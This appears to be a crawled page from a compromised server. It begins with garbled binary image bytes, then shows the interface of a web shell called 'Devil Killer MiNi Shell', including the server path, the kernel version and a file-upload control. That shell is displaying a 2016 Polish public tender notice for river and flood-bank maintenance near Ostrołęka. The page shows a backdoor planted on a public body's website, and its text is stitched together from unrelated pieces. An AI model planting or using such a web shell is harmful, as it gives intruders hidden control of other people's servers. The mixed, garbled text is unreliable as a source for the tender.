JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160908/306584-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 306584 - 2016
              z dnia 2016-09-08 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ostrołęka: Działania w zakresie utrzymania urządzeń melioracji wodnych podstawowych i wód istotnych dla regulacji stosunków wodnych na potrzeby rolnictwa na terenie powiatu makowskiego, wyszkowskiego i ostrołęckiego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Ostrołęce, krajowy numer identyfikacyjny
              58558400103, ul.
              ul. Poznańska 
              19,
              07409  
              Ostrołęka, woj.
              mazowieckie, państwo
              , tel.
              297 603 226, e-mail
              zfsuo.ostroleka@warszawa.wzmiuw.gov.pl, faks
              297 604 657.
              <br />
              Adres strony internetowej (URL): www.wzmiuw.waw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny:  Wojewódzka Samorządowa Jednostka Organizacyjna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.wzmiuw.waw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. 10c ust.2 ustawy Pzp w związku z art. 18 ustawy z dnia 22 czerwca 2016r. o zmianie ustawy - Prawo zamówień publicznych oraz niektórych innych (Dz. U z 2016r. poz.1020) ustaw składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r. - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015r. poz. 1830), osobiście lub za pośrednictwem posłańca Pod adres: <br />
                Adres:
                <br />WZMiUW w Warszawie  Oddział  w Ostrołęce 07- 409 Ostrołęka, ul. Poznańska 19 </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Działania w zakresie utrzymania urządzeń melioracji wodnych podstawowych i wód istotnych dla regulacji stosunków wodnych na potrzeby rolnictwa na terenie powiatu makowskiego, wyszkowskiego i ostrołęckiego<br /><b>Numer referencyjny: </b>UW/O  4103.ZP.98/2016                      <br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest Działania w zakresie utrzymania urządzeń melioracji wodnych podstawowych i wód istotnych dla regulacji stosunków wodnych na potrzeby rolnictwa na terenie powiatu makowskiego, wyszkowskiego i ostrołęckiego

Szczegółowy zakres robót obejmuje wykonanie:
Część 1  Utrzymanie wód rzeki Ciek Bagienice, rzeki Jaciążki, rzeki Orzyc, rzeki Węgierki powiat makowski. 
1.	Utrzymanie rzeki Ciek Bagienice, gm. Krasnosielc, powiat makowski, 
2.	Utrzymanie rzeki Jaciążki, gm. Płoniawy-Bramura, powiat makowski,  
3.	Utrzymanie rzeki Orzyc, gm. Krasnosielc, powiat makowski, 
4.	Utrzymanie rzeki Węgierki, gm. Płoniawy-Bramura, powiat makowski, 

Zakres robót utrzymaniowych na w/w części obejmował będzie:
	wykoszenie porostów ręcznie i mechanicznie  ze skarp i poboczy rzeki, porost gesty, twardy, wraz z wygrabieniem
	ręczne wykoszenie porostów z dna rzeki, porost gesty, wraz z wygrabieniem
	usunięcie krzaków średniej gęstości ze skarp i ich odrostów
	ręczne usunięcie przetamowań, zatorów i wiatrołomów z koryta cieku

Część 2  Utrzymanie wód rzeki Ruda, rzeki Kanał A,  powiat wyszkowski. 
1.	Utrzymanie rzeki Ruda, gm. Wyszków i Zabrodzie, powiat wyszkowski, 
2.	Utrzymanie rzeki Kanał A, gm. Rząśnik i Długosiodło, powiat wyszkowski, 
3.	Konserwacja wału  przeciwpowodziowy rzeki Bug odcinki Udrzyn-Tuchlin:  wał A, wał B; Tuchlin-Budy; Latoszek, powiat wyszkowski, 

Zakres robót utrzymaniowych na w/w części obejmował będzie:
	ręczne i mechaniczne wykoszenie porostów za skarp i poboczy z wygrabianiem,
	ręczne wykoszenie porostów z dna  z  wygrabieniem,	
	usunięcie krzaków ze skarp śr. gęstości i ich odrostów,
	usuwanie wiatrołomów, gałęzi i nieczystości z koryta rzeki,
	usuwanie tam bobrowych z koryta rzeki,
	wykonanie bieżącej konserwacji budowli poprzez oczyszczenie betonowych umocnień skarp i dna z namułu i porostów w obrębie budowli, dokonanie zabezpieczenia antykorozyjnego budowli oraz malowanie elementów metalowych (kolor niebieski), smarowanie ręcznego mechanizmu wyciągowego  jaz (1J) w km 6+580 i zastawka (1Z) w km 4+850 ( Rzeka Kanał A ),
	wykonanie palisady w obrębie zastawki (1Z)  i uzupełnienie ubytków w płytach betonowych w ubezpieczeniu skarp  (obmiar: robocizna  40 r-g; kołki śr. 8-10 dł. 150cm  szt. 166; beton  2 m; odwodnienie (grodzie, rura), koparko- ładowarka- 10m-g), ( Rzeka Kanał A ), 
	nadzór przyrodniczy,
	wykoszenie porostu ze skarp i korony wału porost gęsty miękki z wygrabieniem,
	usunięcie nieczystości (papiery, butelki) odc. wał Latoszek z wywiezieniem.

Część 3  Utrzymanie wód rzeki Orz, gmina Goworowo i Czerwin,  powiat ostrołęcki. 

Zakres robót utrzymaniowych na rzece Orz obejmował będzie:
	Mechaniczne wykoszenie i wygrabienie na ławę porostów ze skarp i ławy rzeki.
	Ręczne wykoszenie i wygrabienie na ławę porostów gęstych twardych ze skarp i ławy  rzeki.
	Ręczne wykoszenie porostów rzadkich z dna rzeki i wyrzucenie ich na ławę przy zarośnięciu dna 90%
	Mechaniczne wykoszenie porostów rzadkich z dna rzeki i wyrzucenie ich na ławę przy zarośnięciu
 dna 90 %
	Usunięcie przetamowań i powalonych drzew z koryta rzeki 
	Ręczna wycinka zakrzaczeń ze skarp rzeki.

Część 4  Utrzymanie wód rzeki Kanał Pełtówka, gmina Myszyniec, powiat ostrołęcki.

Zakres robót utrzymaniowych na rzece Kanał Pełtówka  obejmował będzie:
	Mechaniczne odmulenie dna rzeki wraz z rozplantowaniem urobku po odmuleniu 
	Oczyszczenie terenu z pozostałości po rozplantowaniu urobku z odmulenia
 
Część 5  Utrzymanie wód rzeki Trybówka, gmina Czarnia, powiat ostrołęcki. 

Zakres robót utrzymaniowych na rzece Trybówka  obejmował będzie
	Mechaniczne odmulenie dna rzeki wraz z rozplantowaniem urobku po odmuleniu 
	Oczyszczenie terenu z pozostałości po rozplantowaniu urobku z odmulenia

Część 6  Utrzymanie wód rzeki Kanał A Charciabałda, gmina Myszyniec, powiat ostrołęcki. 

Zakres robót utrzymaniowych na rzece Kanał A Charciabałda  obejmował będzie
	Mechaniczne odmulenie dna rzeki wraz z rozplantowaniem urobku po odmuleniu, 
	Oczyszczenie terenu z pozostałości po rozplantowaniu urobku z odmulenia,


2. Wykonawca zobowiązany jest we własnym zakresie:
- uzyskać stosowne zezwolenie na transport po przyległych drogach na czas realizacji prac. Transport należy dostosować do nośności i klasy dróg 
- utrzymywać ład i porządek na obiekcie w okresie trwania umowy, 
- uzyskać stosowne zgody od właścicieli przyległych nieruchomości na czas realizacji prac utrzymaniowych, 
- Wykonawca odpowiedzialny będzie za całokształt, w tym za bieg oraz terminowe wykonanie zadania.
- Wykonawca odpowiedzialny jest za jakość, zgodność z warunkami technicznymi i  jakościowymi  określonymi dla przedmiotu zamówienia.
- Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem zamówienia.

Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SIWZ: 
- przedmiar robót, 
- wytyczne wykonania i odbioru robót. 

3. Wymagania dotyczące robót i materiałów:
1) Wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi  normami, warunkami technicznymi, przepisami BHP, P.poż.
2) Szczegółowy opis zamówienia i zakres usług związanych z realizacją zamówienia przedstawiony został w uproszczonych dokumentacjach projektowych składających się z wytycznych wykonania i odbioru i przedmiaru robót. Wszystkie ewentualne nazwy urządzeń, wyrobów, surowców, technologii wykonania usług użyte w uproszczonej dokumentacji technicznej są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Zamawiający dopuszcza zastosowanie wyrobów równoważnych pod warunkiem spełniania przez nie parametrów równoważności określonych w dokumentacji i wymaganiach wykonania i odbioru usług.
UWAGA: 
Zaleca się, aby wykonawca dokonał wizji lokalnej w terenie (sprawdzenie przedmiaru robót ze stanem faktycznym) i jego otoczenia, a także zdobył na swoja własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu ponosi Wykonawca.
4. Wykonawca zobowiązany jest do wykazania w druku Formularz oferty, stanowiącym załącznik nr 1 do Specyfikacji, jaką część (zakres) zamówienia zamierza powierzyć podwykonawcom.

5. Na podstawie art. 29 ust. 3a ustawy Pzp, zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę co najmniej 1 osoby, przewidzianej do kierowania robotami objętych przedmiotem umowy, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1* ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy oraz  wskazanych imiennie w wykazie osób. 
*art. 22 § 1 ustawy z dnia 26 czerwca 1976 r. -Kodeks pracy: Przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca - do zatrudniania pracownika za wynagrodzeniem.
<br /><br /><b>II.5) Główny kod CPV: </b>90721800-5<br /><b> Dodatkowe kody CPV:</b>45246400-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonawca 
(potwierdzoną dowodami określającymi,  czy robota ta została wykonana w sposób należyty oraz wskazującymi, czy została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona)
	zrealizował co najmniej 1 zamówienie polegające na: 
- wykonanie usług konserwacyjnych na rzekach albo urządzeniach melioracji wodnych o wartości min: 
Część 1   100 000 zł. brutto,
Część 3,6  55 000 zł. brutto,
Część 4     80 000 zł. brutto,

- wykonanie usług konserwacyjnych na rzekach i wałach przeciwpowodziowych albo urządzeniach melioracji wodnych o wartości min:
Część 2    100 000  zł. brutto,

	zrealizował jedno lub więcej zamówień o łącznej  wartości: 
- wykonanie usług konserwacyjnych na rzekach albo urządzeniach melioracji wodnych o wartości min: 
Część 5  125 000 zł. brutto.

W przypadku złożenia oferty na więcej niż jedną część zamówienia, poszczególne wartości należy sumować. 
Warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu wykonanych głównych usług na formularzu określonym w rozdziale VI B. pkt 1 SIWZ i ogłoszeniu.

b)	dysponują sprzętem i urządzeniami niezbędnymi do wykonania zamówienia, w szczególności: dla części 
	dla każdej z części 1,  zamówienia po 1 zestawie/ kpl.,
	ciągnik kołowy z kosiarką bijakową lub koparka wyposażona w głowicę koszącą,
	dla każdej z części 2,  zamówienia po 1 zestawie/ kpl.,
	ciągnik kołowy z kosiarką bijakową lub koparka wyposażona w głowicę koszącą,
	koparka,
	dla każdej z części 3,  zamówienia po 1 zestawie/ kpl.,
	ciągnik kołowy z kosiarką bijakową lub koparka wyposażona w głowicę koszącą, 
	koparka wyposażona w obrotową głowicę koszącą, 
	koparka,
	dla każdej z części 4,5,6  zamówienia po 1 zestawie/ kpl.,
	koparka z łyżką odmulającą o poj. 0,08  0,12 m,
	spycharka lub ciągnik kołowy + brona aktywna,
	ciągnik kołowy + przyczepa, 

 Ponadto do wszystkich 6 części należy dysponować następującymi narzędziami: kosy spalinowe, kosy    
 ręczne, piła spalinowa, siekiera, grabie, łopaty, szpadle, widły,  bosaki.
W przypadku złożenia oferty na więcej niż jedną część zamówienia, poszczególne ilości sprzętu należy sumować.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">4). zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  
5). zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie  z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  
6). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w rozdz. VI B pkt  4 i 5 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę, lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
A). nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
Dokument, o których mowa powyżej w pkt 6 lit. A  powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
7). Jeżeli  w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument dotyczy nie wydaje się dokumentów, o których mowa powyżej w pkt 6 zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument ma dotyczyć złożone przed notariuszem  lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1). Wykazu prac utrzymaniowych wykonanych nie wcześniej niż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, zamówień z podaniem ich rodzaju i wartości oraz daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Wykaz należy sporządzić zgodnie z drukiem stanowiącym załącznik nr 5 do SIWZ  WYKAZ ZREALIZOWANYCH ROBÓT.
Dowodami są: poświadczenia bądź inne dokumenty wystawione przez podmiot, na rzecz którego prace utrzymaniowe były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty.
